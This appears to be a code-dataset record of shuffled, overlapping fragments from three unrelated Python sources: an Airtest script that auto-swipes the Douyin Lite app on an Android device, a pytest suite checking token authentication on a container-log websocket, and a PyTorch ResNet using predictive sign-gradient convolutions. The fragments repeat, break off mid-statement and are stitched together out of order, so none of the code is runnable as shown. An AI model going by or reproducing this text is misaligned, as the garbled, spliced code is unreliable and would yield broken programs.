"print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua =", "while 1: hua += 1 滑动方向 += 1 if hua", "+= 1 滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\",", "record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "-0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") #", "auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\")", "sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report", "1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from", "* from airtest.cli.parser import cli_setup # from douyin import *", "airtest.cli.parser import cli_setup # from douyin import * if not", "# from douyin import * if not cli_setup(): auto_setup(__file__, logdir=True,", "import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ])", "wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0", "# generate html report # from airtest.report.report import simple_report #", "script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机" ]
[ "is not None assert in_log in result delete_all(client, [c]) def", "ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def", "import websocket as ws import pytest def get_logs(client): hosts =", "{}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c)", "'?token='+logs.token) result = conn.recv() assert result is not None assert", "random_str() cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c", "def test_logs_token(client): logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url", "2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs =", "as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value) delete_all(client,", "c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs()", "= ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result is", "import * # NOQA import websocket as ws import pytest", "[c]) def test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception)", "get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert", "logs = c.logs() return logs, in_log, c def test_logs_token(client): logs,", "= get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status", "status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _,", "401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c", "client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs() return logs,", "logs, in_log, c def test_logs_token(client): logs, in_log, c = get_logs(client)", "conn.recv() assert result is not None assert in_log in result", "assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client):", "hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log =", "in_log = random_str() cmd = '/bin/bash -c \"echo {}; sleep", "pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) >", "ws import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert", "with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in", "= client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log = random_str()", "with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in", "assert result is not None assert in_log in result delete_all(client,", "in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c", "not None assert in_log in result delete_all(client, [c]) def test_logs_no_token(client):", "> 0 in_log = random_str() cmd = '/bin/bash -c \"echo", "0 in_log = random_str() cmd = '/bin/bash -c \"echo {};", "command=cmd) c = client.wait_success(c) logs = c.logs() return logs, in_log,", "delete_all(client, [c]) def test_logs_no_token(client): logs, _, c = get_logs(client) with", "in_log, c def test_logs_token(client): logs, in_log, c = get_logs(client) conn", "sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs", "def test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as", "get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log", "'/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd)", "delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with", "test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo:", "= '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID,", "= get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status", "return logs, in_log, c def test_logs_token(client): logs, in_log, c =", "test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo:", "= c.logs() return logs, in_log, c def test_logs_token(client): logs, in_log,", "None assert in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs,", "c def test_logs_token(client): logs, in_log, c = get_logs(client) conn =", "result is not None assert in_log in result delete_all(client, [c])", "pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value)", "= random_str() cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log)", "excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c])", "conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result", "c = client.wait_success(c) logs = c.logs() return logs, in_log, c", "len(hosts) > 0 in_log = random_str() cmd = '/bin/bash -c", "c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake", "result = conn.recv() assert result is not None assert in_log", "= client.wait_success(c) logs = c.logs() return logs, in_log, c def", "from common_fixtures import * # NOQA import websocket as ws", "def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0", "assert in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs, _,", "in result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c =", "client.wait_success(c) logs = c.logs() return logs, in_log, c def test_logs_token(client):", "excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c])", "as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client,", "_, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert", "NOQA import websocket as ws import pytest def get_logs(client): hosts", "get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401'", "in_log, c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result", "pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value)", "c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result =", "test_logs_token(client): logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url +", "'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs,", "logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token')", "= conn.recv() assert result is not None assert in_log in", "logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token)", "* # NOQA import websocket as ws import pytest def", "client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log = random_str() cmd", "= get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv()", "def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as", "in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c =", "ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result is not", "_, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert", "c.logs() return logs, in_log, c def test_logs_token(client): logs, in_log, c", "= client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs() return", "# NOQA import websocket as ws import pytest def get_logs(client):", "get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401'", "removed_null=True) assert len(hosts) > 0 in_log = random_str() cmd =", "-c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c", "\"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c =", "logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url)", "+ '?token='+logs.token) result = conn.recv() assert result is not None", "assert len(hosts) > 0 in_log = random_str() cmd = '/bin/bash", "websocket as ws import pytest def get_logs(client): hosts = client.list_host(kind='docker',", "result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c = get_logs(client)", "cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c =", "import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts)", "common_fixtures import * # NOQA import websocket as ws import", "c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake", "str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client)", "[c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception)", "as ws import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True)" ]
[ "Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch", "planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False,", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential()", "WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD =", "x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out)", "in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION,", "is not None: out = self.layer4(out) # out = F.avg_pool2d(out,", "ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep", "!= self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride,", "for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import", "np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers #", "nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out)", "out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out =", "ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True,", "= 4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() #", "reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if", "= F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0),", "[3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def", "PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD", "writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes,", "= nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2", "= conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes)", "self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 =", "= nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block,", "PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1,", "num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3,", "Deep Residual Learning for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops", "using PSG in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference:", "= threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock,", "nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64,", "bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def", "nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False,", "self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params =", "self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)", "num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD,", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes,", "MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN", "= sparsify SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes,", "in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params", "stride): strides = [stride] + [1]*(num_blocks-1) layers = [] for", "self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1", "m in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return", "== \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std", "isin import torch import torch.nn as nn import torch.nn.functional as", "arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch import torch.nn", "out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward", "512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion,", "self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)", "* block.expansion return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x)))", "stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes,", "input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward =", "self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128,", "= conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes)", "def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with", "stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block,", "non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, num_blocks,", "planes, stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers) def", "nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan)", "PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,", "16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block,", "std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method", "msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1,", "init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "nn.Sequential() if stride != 1 or in_planes != self.expansion*planes: self.shortcut", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "<NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning for Image Recognition.", "out += self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module):", "nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0", "= [stride] + [1]*(num_blocks-1) layers = [] for stride in", "math.sqrt(2.0 * fan) with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)", "module.weight.data = module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\": fan", "32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD = False", "= layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 = self._make_layer(block,", "self.layer1(out) out = self.layer2(out) out = self.layer3(out) if self.layer4 is", "writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes,", "None BIPRECISION = False PREDICTIVE_FORWARD = False WRITER = None", "to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method", "import isin import torch import torch.nn as nn import torch.nn.functional", "/ float(fan_in + fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() *", "import layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32", "sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard',", "self.layer4 is not None: out = self.layer4(out) # out =", "as nn import torch.nn.functional as F import math import numpy", "128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4", "def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes,", "with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method ==", ") def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out))", "conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if", "predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS,", "self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False,", "= nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3", "return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True,", "predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes,", "conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) #", "self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method))", "None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS", "self.in_planes = planes * block.expansion return nn.Sequential(*layers) def forward(self, x):", "list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = [] for m", "Residual Learning for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import", "import math import numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d", "mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif", "strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion return", "sparsify SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def", "0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT", "= [] for m in self.modules(): if isinstance(m, nn.Conv2d): bop_params", "out = self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out) return", "self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module): expansion =", "import torch.nn as nn import torch.nn.functional as F import math", "= msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN =", "fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain", "convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d(", "conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) #", "{}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method ==", "== \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight,", "import torch import torch.nn as nn import torch.nn.functional as F", "a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization option!\") def", "predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS,", "F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out = self.layer3(out)", "if self.layer4 is not None: out = self.layer4(out) # out", "out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params def", "= conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes)", "SPARSIFY = False SIGN = True def conv1x1(in_planes, out_planes, stride=1,", "self.shortcut(x) out = F.relu(out) return out class ResNet(nn.Module): def __init__(self,", "num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 =", "return out class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10,", "MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits", "init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut =", "def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out", "def _make_layer(self, block, planes, num_blocks, stride): strides = [stride] +", "= torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\",", "ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD,", "F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out) return", "nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out =", "= nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data", "non_bop_params = [] for m in self.modules(): if isinstance(m, (nn.Linear,", "expansion = 1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__()", "msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN = sign", "= sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10,", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "'''ResNet using PSG in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'.", "= 8 THRESHOLD = 0.0 SPARSIFY = False SIGN =", "writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward", "input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out =", "elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std =", "nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif 